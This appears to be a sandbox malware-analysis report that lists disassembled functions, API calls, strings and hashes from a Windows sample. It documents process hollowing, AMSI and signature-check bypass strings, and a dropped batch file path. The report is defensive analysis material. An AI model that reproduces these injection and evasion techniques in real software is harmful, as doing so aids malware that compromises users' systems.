                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                            • API String ID: 2533507481-2367850715
                                                                                                                            • Opcode ID: b46359b7087217412d6a3a14a9728553da7971a05c77b492dcd8bd9a8c399b36
                                                                                                                            • Instruction ID: 73d3ae1f8aaad94fecebdcf4eaf511d58b285331ab963a0dbf569c467f062bc4
                                                                                                                            • Opcode Fuzzy Hash: b46359b7087217412d6a3a14a9728553da7971a05c77b492dcd8bd9a8c399b36
                                                                                                                            • Instruction Fuzzy Hash: 30E23D30A112699FEF11FBA4DC81ADEB3FAEFC5710F1490A5A009AB254DE30AE45CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02997F46 Relevance: 41.8, APIs: 8, Strings: 15, Instructions: 1553nativeprocessthreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 9685 2997f46-2997f4b 9687 2997f50-2997f55 9685->9687 9687->9687 9688 2997f57-299803e call 2984954 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9687->9688 9719 29999ab-2999a15 call 29844c4 * 2 call 2984c24 call 29844c4 call 29844a0 call 29844c4 * 2 9688->9719 9720 2998044-299811f call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9688->9720 9720->9719 9764 2998125-299844d call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2983098 * 2 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984da4 call 2984db4 CreateProcessAsUserW 9720->9764 9871 299844f-29984bb call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9764->9871 9872 29984c0-29987e6 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2982ee0 call 2982f08 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 GetThreadContext 9764->9872 9871->9872 9872->9719 9980 29987ec-2998a4f call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 NtReadVirtualMemory 9872->9980 10051 2998d5c-2998dc8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9980->10051 10052 2998a55-2998bbe call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 NtUnmapViewOfSection 9980->10052 10079 2998dcd-2998f4d call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997968 10051->10079 10138 2998be8-2998c54 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 10052->10138 10139 2998bc0-2998be6 call 2997968 10052->10139 10079->9719 10183 2998f53-299904c call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997e58 10079->10183 10147 2998c59-2998d5a call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997968 10138->10147 10139->10147 10147->10079 10232 299904e-299909b call 2997d50 call 2997d44 10183->10232 10233 29990a0-29999a6 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 NtWriteVirtualMemory call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 NtWriteVirtualMemory call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 SetThreadContext NtResumeThread call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2982c2c call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997ac0 * 3 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997ac0 * 2 call 2984824 call 2984964 call 29847b0 call 2984964 call 2997ac0 call 2984824 call 2984964 call 29847b0 call 2984964 call 2997ac0 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 10183->10233 10232->10233 10233->9719
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
                                                                                                                              • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
                                                                                                                              • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
                                                                                                                            • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029E4398,029E4388,OpenSession,029E4360,02999A30,ScanString,029E4360), ref: 02998446
                                                                                                                            • GetThreadContext.KERNEL32(0000083C,029E43DC,ScanString,029E4360,02999A30,UacInitialize,029E4360,02999A30,ScanBuffer,029E4360,02999A30,ScanBuffer,029E4360,02999A30,UacInitialize,029E4360), ref: 029987DF
                                                                                                                            • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,002A4FF8,029E44B0,00000004,029E44B8,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360), ref: 02998A3C
                                                                                                                            • NtUnmapViewOfSection.N(00000840,00400000,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,00000840,002A4FF8,029E44B0,00000004,029E44B8), ref: 02998BB7
                                                                                                                              • Part of subcall function 02997968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997975
                                                                                                                              • Part of subcall function 02997968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299797B
                                                                                                                              • Part of subcall function 02997968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0299799B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                            • API String ID: 3979268988-2367850715
                                                                                                                            • Opcode ID: 07b27951bb8b5e37c9605d3cd40c8a4392e0da12ce1ea6fe9e9ceae7d76c7a05
                                                                                                                            • Instruction ID: 3871ce68b2728f9c8b93aa123e0a846e4c983ddbb86c993bf0654b15d9288a75
                                                                                                                            • Opcode Fuzzy Hash: 07b27951bb8b5e37c9605d3cd40c8a4392e0da12ce1ea6fe9e9ceae7d76c7a05
                                                                                                                            • Instruction Fuzzy Hash: 53E23D30A112699FEF11FBA4DC81ADEB3FAEFC5710F1491A5A009AB254DE30AE45CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02985A90 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 10506 2985a90-2985ad1 GetModuleFileNameA RegOpenKeyExA 10507 2985b13-2985b56 call 29858cc RegQueryValueExA 10506->10507 10508 2985ad3-2985aef RegOpenKeyExA 10506->10508 10513 2985b58-2985b74 RegQueryValueExA 10507->10513 10514 2985b7a-2985b94 RegCloseKey 10507->10514 10508->10507 10509 2985af1-2985b0d RegOpenKeyExA 10508->10509 10509->10507 10511 2985b9c-2985bcd lstrcpynA GetThreadLocale GetLocaleInfoA 10509->10511 10515 2985bd3-2985bd7 10511->10515 10516 2985cb6-2985cbd 10511->10516 10513->10514 10519 2985b76 10513->10519 10517 2985bd9-2985bdd 10515->10517 10518 2985be3-2985bf9 lstrlenA 10515->10518 10517->10516 10517->10518 10521 2985bfc-2985bff 10518->10521 10519->10514 10522 2985c0b-2985c13 10521->10522 10523 2985c01-2985c09 10521->10523 10522->10516 10525 2985c19-2985c1e 10522->10525 10523->10522 10524 2985bfb 10523->10524 10524->10521 10526 2985c48-2985c4a 10525->10526 10527 2985c20-2985c46 lstrcpynA LoadLibraryExA 10525->10527 10526->10516 10528 2985c4c-2985c50 10526->10528 10527->10526 10528->10516 10529 2985c52-2985c82 lstrcpynA LoadLibraryExA 10528->10529 10529->10516 10530 2985c84-2985cb4 lstrcpynA LoadLibraryExA 10529->10530 10530->10516
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02980000,029AB790), ref: 02985AAC
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985ACA
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985AE8
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02985B06
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02985B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02985B4F
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,02985CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02985B95,?,80000001), ref: 02985B6D
                                                                                                                            • RegCloseKey.ADVAPI32(?,02985B9C,00000000,?,?,00000000,02985B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02985B8F
                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02985BAC
                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02985BB9
                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02985BBF
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02985BEA
                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C31
                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C41
                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C69
                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C79
                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02985C9F
                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02985CAF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                            • API String ID: 1759228003-2375825460
                                                                                                                            • Opcode ID: f52c0c949244a260a67eebc63fff390b94327dc63d328332e0c32506e3719cc8
                                                                                                                            • Instruction ID: 1fc95ffa9080e6b38b095b27f00678c2cfc2c321ad0bf757e9aa38af9ccb30d0
                                                                                                                            • Opcode Fuzzy Hash: f52c0c949244a260a67eebc63fff390b94327dc63d328332e0c32506e3719cc8
                                                                                                                            • Instruction Fuzzy Hash: 1951B8B1A4020C7EFB25F6E4CC46FEF7BAD9B44744F8A01A5A704E61C1E7749A488F61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0299CA6C Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 400processsynchronizationCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 12240 299ca6c-299ca70 12241 299ca75-299ca7a 12240->12241 12241->12241 12242 299ca7c-299cf2f call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984704 * 2 call 2984824 call 298473c call 2983098 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984704 call 2987ee8 call 2984964 call 2984d38 call 2984db4 call 2984704 call 2984964 call 2984d38 call 2984db4 CreateProcessAsUserW call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 12241->12242 12403 299d03a-299d087 call 29844c4 call 2984c24 call 29844c4 call 2984c24 call 29844c4 12242->12403 12404 299cf35-299d035 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 WaitForSingleObject CloseHandle * 2 12242->12404 12404->12403
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
                                                                                                                              • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
                                                                                                                              • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
                                                                                                                            • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,029E4644,029E4688,ScanString,029E4344,0299D0A4,OpenSession,029E4344), ref: 0299CDD3
                                                                                                                            • WaitForSingleObject.KERNEL32(000005C0,000000FF,ScanString,029E4344,0299D0A4,OpenSession,029E4344,0299D0A4,ScanString,029E4344,0299D0A4,OpenSession,029E4344,0299D0A4,UacScan,029E4344), ref: 0299D01F
                                                                                                                            • CloseHandle.KERNEL32(000005C0,000005C0,000000FF,ScanString,029E4344,0299D0A4,OpenSession,029E4344,0299D0A4,ScanString,029E4344,0299D0A4,OpenSession,029E4344,0299D0A4,UacScan), ref: 0299D02A
                                                                                                                            • CloseHandle.KERNEL32(00000870,000005C0,000005C0,000000FF,ScanString,029E4344,0299D0A4,OpenSession,029E4344,0299D0A4,ScanString,029E4344,0299D0A4,OpenSession,029E4344,0299D0A4), ref: 0299D035
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
                                                                                                                            • String ID: *"C:\Users\Public\Libraries\UcvuiswbO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                                            • API String ID: 1205125484-1204875182
                                                                                                                            • Opcode ID: 74974e767cc30514e6e85b68489572857c7bfe08f3687e16e6f93d4c0e4a606f
                                                                                                                            • Instruction ID: fe474f8912aeb17ee39ab5892189c0aab1d0f90cd9ef6dd464820a20635533af
                                                                                                                            • Opcode Fuzzy Hash: 74974e767cc30514e6e85b68489572857c7bfe08f3687e16e6f93d4c0e4a606f
                                                                                                                            • Instruction Fuzzy Hash: ADF1F034A1025A9FEF10FBA4D880FDEB7B6AFC5710F149061A105BB254DB74EE468F61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02997AC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 12444 2997ac0-2997adb LoadLibraryW 12445 2997b0a-2997b12 12444->12445 12446 2997add-2997ae6 GetProcAddress 12444->12446 12447 2997ae8-2997b00 NtWriteVirtualMemory 12446->12447 12448 2997b04-2997b05 FreeLibrary 12446->12448 12447->12448 12449 2997b02 12447->12449 12448->12445 12449->12448
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(bcrypt,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360,02999A30,UacInitialize,029E4360,02999A30,0000083C,029E43DC,ScanString,029E4360,02999A30), ref: 02997AD2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02997ADF
                                                                                                                            • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360,02999A30,UacInitialize), ref: 02997AF6
                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360,02999A30,UacInitialize,029E4360,02999A30,0000083C,029E43DC), ref: 02997B05
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                            • String ID: BCryptVerifySignature$bcrypt
                                                                                                                            • API String ID: 1002360270-4067648912
                                                                                                                            • Opcode ID: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                                                            • Instruction ID: 4d8fae19891dc99a90615f26a17ac372393fd551bf18636c5140dbbcc39a6e6f
                                                                                                                            • Opcode Fuzzy Hash: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                                                            • Instruction Fuzzy Hash: 6FF0E2B26193543EEA2161A95C84EFFA29DCBC27B1F04462DF5549A280DB618804C3B1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02997966 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24librarymemorynativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997975
                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299797B
                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0299799B
                                                                                                                            Strings
                                                                                                                            • NtAllocateVirtualMemory, xrefs: 0299796B
                                                                                                                            • C:\Windows\System32\ntdll.dll, xrefs: 02997970
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                            • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                            • API String ID: 421316089-2206134580
                                                                                                                            • Opcode ID: 516baaf22a2e1adc51648d96bbff9bea6e8700d7076f2266cfe532678e614c85
                                                                                                                            • Instruction ID: b7e096b5321ef14df4c06165886d527a33aae8c779515cb573e440ab0d54c3f3
                                                                                                                            • Opcode Fuzzy Hash: 516baaf22a2e1adc51648d96bbff9bea6e8700d7076f2266cfe532678e614c85
                                                                                                                            • Instruction Fuzzy Hash: 98E09AB6A4024CBFDF00EF98DC49EEA77ACEB48610F445411BA19DB640DA70E9508BB5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02997968 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23librarymemorynativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997975
                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299797B
                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0299799B
                                                                                                                            Strings
                                                                                                                            • NtAllocateVirtualMemory, xrefs: 0299796B
                                                                                                                            • C:\Windows\System32\ntdll.dll, xrefs: 02997970
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                            • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                            • API String ID: 421316089-2206134580
                                                                                                                            • Opcode ID: 511d5e84030df0c08940d7c02e6d78542cd2fe99c888f0db8c7bca059c6a0943
                                                                                                                            • Instruction ID: 26ba5a6e6ab3691b7857d9bcfe90ee0809cb0300295a1b9948d0b5b7fdaff78c
                                                                                                                            • Opcode Fuzzy Hash: 511d5e84030df0c08940d7c02e6d78542cd2fe99c888f0db8c7bca059c6a0943
                                                                                                                            • Instruction Fuzzy Hash: 7FE09AB694024CBFDF00EF98D849EDA77ACEB48610F445411BA19DB640DA70E5508BB5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0299C4DC Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02984EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EF2
                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C5AC), ref: 0299C517
